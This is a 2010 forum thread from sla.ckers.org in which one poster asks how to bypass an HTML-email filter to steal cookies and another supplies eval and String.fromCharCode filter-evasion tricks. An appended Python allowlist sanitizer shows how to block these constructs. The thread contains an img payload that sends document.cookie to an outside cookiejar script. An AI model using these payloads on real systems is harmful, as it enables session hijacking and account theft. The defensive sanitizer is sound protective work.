Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
bypassing a filter
Posted by: progre55
Date: March 15, 2010 11:00PM

Hi people.

I have a problem fooling a filter that strips HTML and removes all vulnerable code.
For instance, if you have this tag:
<img src='http://mysite.com/cookiejar.php?cook='+document.cookie />
the filter puts the extension "defang_" in front of the + sign. It also puts it before any element outside the quotes:
for example <img src='http://mysite.com/cookiejar.php?cook=' + document.cookie /> becomes <img src='http://mysite.com/cookiejar.php?cook=' defang_+ defang_document.cookie />

Any suggestions, please?

Re: bypassing a filter
Posted by: thornmaker
Date: March 16, 2010 10:40AM

eval is your friend

Re: bypassing a filter
Posted by: progre55
Date: March 16, 2010 02:42PM

Well, it's actually an HTML email, and they filter out all the script tags (and their variations), and eval is replaced with evalalert, for which they have an empty function.

Anyways, any good readings on html-email hacks? =)

Re: bypassing a filter
Posted by: thornmaker
Date: March 16, 2010 03:16PM

It can be bypassed, but without seeing the details it's like shooting in the dark.

Try using one of these http://sla.ckers.org/forum/read.php?24,28641 to get a reference to window, e.g. __proto__.__parent__. Then you can do something like __proto__.__parent__['eval'](location.hash.slice(1)). If single quotes still cause problems, you can probably get around that using something like String.fromCharCode(101,118,97,108). If the location object is messed with, then you can put location.hash.slice(1) in quotes too (or use fromCharCode) and eval it twice.

[edit:] Your first example uses an image tag with '+document.cookie, so I assume you already have a way of injecting JS (escaping out of an HTML attribute or whatever). If not, you had best figure that one out first. Remember, there are a lot of ways to inject JS that don't involve script tags.
Edited 1 time(s). Last edit at 03/16/2010 03:22PM by thornmaker.

Re: bypassing a filter
Posted by: progre55
Date: March 16, 2010 05:51PM

Thanks man, I'll try all that and get back to you with success.. hopefully :)

Re: bypassing a filter
Posted by: progre55
Date: March 16, 2010 06:22PM

btw,
"remember, there are a lot of ways to inject JS that don't involve script tags."

Any threads or hints on this, please? :)

edit: Well actually, I could use script in attributes like onmouseover, onwhatever, etc. :)
But any other ways?
Edited 1 time(s). Last edit at 03/16/2010 06:38PM by progre55.
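The filter discussed in this thread patches suspicious tokens in place ("defang_", "evalalert") and leaves the rest of the submitted markup intact, which is why every new token form becomes a new thing to chase. An added defensive counter-example, not code from the forum or from either poster: a small allowlist sanitizer in Python that re-serialises only known tags and attributes, so the '+document.cookie attribute break-out, event-handler attributes such as onmouseover and script tags are all dropped rather than rewritten. The tag list, the attribute sets and the safe_url rules are choices made for this example; the inputs in the comments are constructed from the thread.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags that survive and, per tag, the only attributes kept. Event handlers such
# as onmouseover/onerror are never listed, so they are dropped, not rewritten.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(), "img": {"src", "alt"}}
VOID = {"br", "img"}
DROP_CONTENT = {"script", "style"}  # tag and its text are both discarded

def safe_url(value):
    """Absolute http(s) URL with no quote/angle characters, else None."""
    value = (value or "").strip()   # javascript:, data:, relative, missing -> None
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return None if any(c in value for c in "'\"<>") else value

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0
    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT: self.skip += 1
        if tag not in ALLOWED:
            return                  # unknown tag is removed; its text survives
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag]:
                continue            # e.g. onmouseover, or the stray "+document.cookie" token
            if name == "src":
                value = safe_url(value)
                if value is None:
                    return          # no safe URL: drop the whole <img>
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")  # re-serialised, never copied through
    def handle_endtag(self, tag):
        if tag in DROP_CONTENT and self.skip:
            self.skip -= 1
        elif tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))

def sanitize(html):
    # Constructed input from the thread: "<img src='http://mysite.com/cookiejar.php?cook='+document.cookie />"
    # comes back as <img src="http://mysite.com/cookiejar.php?cook="> with the break-out token gone.
    s = Sanitizer()
    s.feed(html); s.close()
    return "".join(s.out)
```

Because the output is rebuilt from the parsed tree, a client that parses the mail differently from the filter's tokenizer has nothing left to disagree about; the filter in the thread, by contrast, depends on its own tokenisation matching the recipient's.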